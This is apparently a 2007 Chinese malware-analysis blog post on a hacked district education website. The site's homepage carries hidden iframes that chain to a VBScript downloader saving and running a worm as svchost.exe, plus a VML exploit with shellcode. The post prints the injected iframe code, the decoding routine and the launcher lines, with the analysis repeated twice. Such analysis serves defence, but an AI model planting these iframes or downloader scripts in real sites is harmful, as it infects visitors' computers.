某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
2007-03-26 21:49
330 查看
endurer 原创
2007-03-26 第1版
该网首页末被加入代码:
/---
<iframe src="hxxp://w**.q**b*b****d.com/b**d*.htm?001" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width="0" height="0" frameborder="0"></iframe><iframe src="hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width="0" height="0" frameborder="0"></iframe><iframe src=%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D width=0 height=0></iframe>
---/
hxxp://www.m*m***ju**.net/bbs/t***j*.htm 包含代码:
/---
<iframe src="hxxp://w.qbbd.com/bd.htm?001" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://w**.q**b*b****d.com/b**d*.htm?001 包含代码:
/---
<iframe src="hxxp://w**.q**b*b****d.com/0.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://w**.q**b*b****d.com/0.htm (瑞星网页监控报为:Trojan.DL.VBS.Agent.clo)包含VBScript脚本代码,功能是用自定义函数:
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
解密变量t的值并执行。
变量t解密后的值为VBScript脚本代码,功能是 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 0.exe,保存为 %temp%/svchost.exe,并创建内容为
/---
Set Shell = Shell.Application
Shell.ShellExecute %temp%/svchost.exe "","","","open",0
---/
的文件svchost.vbs,通过Shell.Application 对象 的 ShellExecute 方法 来运行svchost.vbs,从而让%temp%/svchost.exe得已运行。
文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-26 20:40:47
修改时间 : 2007-3-26 20:41:0
访问时间 : 2007-3-26 0:0:0
大小 : 69037 字节 67.429 KB
MD5 : 35ecfe1014702d38a40a0b428679c06a
%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D即hxxp://j**.t**h*e***c.cn/w**w*k***l//1.htm
包含Javascript脚本代码,功能是用unescape解密并输出变量Words的值,Words解密后的值包含信息:<!-- vml'exploit! --> 和shellcode 代码……
2007-03-26 第1版
该网首页末被加入代码:
/---
<iframe src="hxxp://w**.q**b*b****d.com/b**d*.htm?001" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width="0" height="0" frameborder="0"></iframe><iframe src="hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width="0" height="0" frameborder="0"></iframe><iframe src=%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D width=0 height=0></iframe>
---/
hxxp://www.m*m***ju**.net/bbs/t***j*.htm 包含代码:
/---
<iframe src="hxxp://w.qbbd.com/bd.htm?001" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://w**.q**b*b****d.com/b**d*.htm?001 包含代码:
/---
<iframe src="hxxp://w**.q**b*b****d.com/0.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://w**.q**b*b****d.com/0.htm (瑞星网页监控报为:Trojan.DL.VBS.Agent.clo)包含VBScript脚本代码,功能是用自定义函数:
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
解密变量t的值并执行。
变量t解密后的值为VBScript脚本代码,功能是 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 0.exe,保存为 %temp%/svchost.exe,并创建内容为
/---
Set Shell = Shell.Application
Shell.ShellExecute %temp%/svchost.exe "","","","open",0
---/
的文件svchost.vbs,通过Shell.Application 对象 的 ShellExecute 方法 来运行svchost.vbs,从而让%temp%/svchost.exe得已运行。
文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-26 20:40:47
修改时间 : 2007-3-26 20:41:0
访问时间 : 2007-3-26 0:0:0
大小 : 69037 字节 67.429 KB
MD5 : 35ecfe1014702d38a40a0b428679c06a
Scanned file: 0.rar - Infected |
0.rar/0.exe - infected by Worm.Win32.Viking.jrStatistics:
|
包含Javascript脚本代码,功能是用unescape解密并输出变量Words的值,Words解密后的值包含信息:<!-- vml'exploit! --> 和shellcode 代码……
相关文章推荐
- 某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码
- 某市河西区教育信息网升级为历代挂马技术展示平台
- ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码
- 某市国税信息检索系统被植入传播Worm.Win32.Delf.bs的代码
- 某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
- 加入购物车代码
- javascript常用加入收藏与设为首页代码
- js代码 设为首页 加入收藏
- <code>标签,加入代码
- 在vs2013IDE中加入代码格式化工具
- jQuery+HTML5加入购物车代码分享
- 设为首页 加入收藏的代码
- IE和FF都兼容的加入收藏的javascript代码
- 弹出一次“设为主页”和“加入收藏”代码
- 在项目中逐步加入Kotlin代码 -> 基本点击事件与跳转
- 某政府网站被加入的自动下载病毒文件的代码变了花样(第3版)
- dedecms 软件下载模块加入flashget快车下载代码
- IE下的FIREBUG,加入代码到网页中即可。
- Java JFrame 表格内容是否允许修改,加入下列代码
- JS设为首页和加入收藏的代码